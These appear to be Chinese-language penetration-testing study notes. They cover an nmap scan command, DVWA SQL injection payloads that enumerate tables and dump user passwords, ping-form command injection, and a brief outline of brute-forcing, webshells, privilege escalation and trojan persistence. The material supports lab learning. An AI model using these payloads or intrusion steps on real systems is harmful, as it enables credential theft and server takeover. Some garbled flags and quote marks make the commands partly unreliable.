nmap -vv -o -ssuv --top-ports 1000 -n -t4 --open -pn -oa 192.168.38.139 --min-rate 10000 192.168.38.139
掃瞄效果:
詳細的結果顯示
作業系統識別
top1000埠掃瞄及指紋識別(包含tcp和udp)
不查詢dns
優化響應時間
只顯示開放埠
禁ping
輸出三種格式(xml,grepable,nmap),檔名為192.168.38.139
掃瞄速度10k
在掃瞄時可根據需要設定–script=類別這種方式進行掃瞄。
漏洞檢測:
啟動phpstudy,在火狐瀏覽器下輸入10.10.8.82/dvwa
調節安全等級—low、middle、high等
使用burp
在資料庫中–,#為注釋。
phpstudy—>其他選項選單—>mysql工具—>mysql命令列
進行mysql語句測試。
不知使用者名稱和密碼的情況:
select * from user where user = 『 『 or 1=1limit 1# 『 and password=』 『;
limit 1: 只輸入1個
語句:select first_name,last_name from users where user_id-『1』
低等難度
user_id=』1』 user_id=1
1 and 1=1# 1 and1=0#
有引號 有資料 有資料
無引號 無資料 無資料
order by
1 』 union select 1 , 2#
1 『 union select table_name,2 from information_schema.tables where table_schema =』dvwa』 #
1 』 union select column_name,2 from information_schema.columns where table_name=』users』 #
1』 union select user,password from users#
中等難度1 『 union select table_name,2 from information_schema.tables where table_schema =database() #
法一:十六進製制(hexincoder),使用火狐算出表名對應的十六進製制,ox+十六進製制
法二:
1 』 union select column_name,2 from information_schema.columns where table_name=(select table_name,2 from information_schema.tables where table_schema =database() limit 1,1) #
第二行,取乙個
在ping命令中注入多條命令
&&、&、;、||、&等實現多條命令執行。
id&&whoami
id;whoami
Linux安全攻防筆記
一 上傳木馬的過程 1 預設埠22弱口令暴力破解 2 21埠或者3306埠弱口令暴力破解 3 webshell進行shell 提權 4 木馬傳入伺服器的上面並且執行,通過木馬的方式來控制你的伺服器進行非法的操作。二 常見操作 1 切入 tmp 3 木馬載入許可權 4 執行木馬 5 後門,支援木馬復活...
Web安全攻防筆記 SQL注入
information schema mysql5.0版本之後,mysql資料庫預設存放乙個information schema資料庫 information schema的三個表 schemata 該表中的字段schema name儲存該使用者建立的所有資料庫的庫名。tables 該表中的字段ta...
無線安全攻防思路
1 常見攻擊物件 一張門禁卡,一把無線鑰匙 乙個無線遙控器 一部手機 一輛汽車 一台無線呼吸監測儀 一架飛機等,只要攻擊物件使用了無線介質進行資料互動,那麼這條無線鏈路就有可能被監聽 解密 重放 欺騙 劫持,甚至被入侵 被控制。2 無線安全攻擊手段 1 無線資料報文監聽 使用與目標無線系統執行頻率相...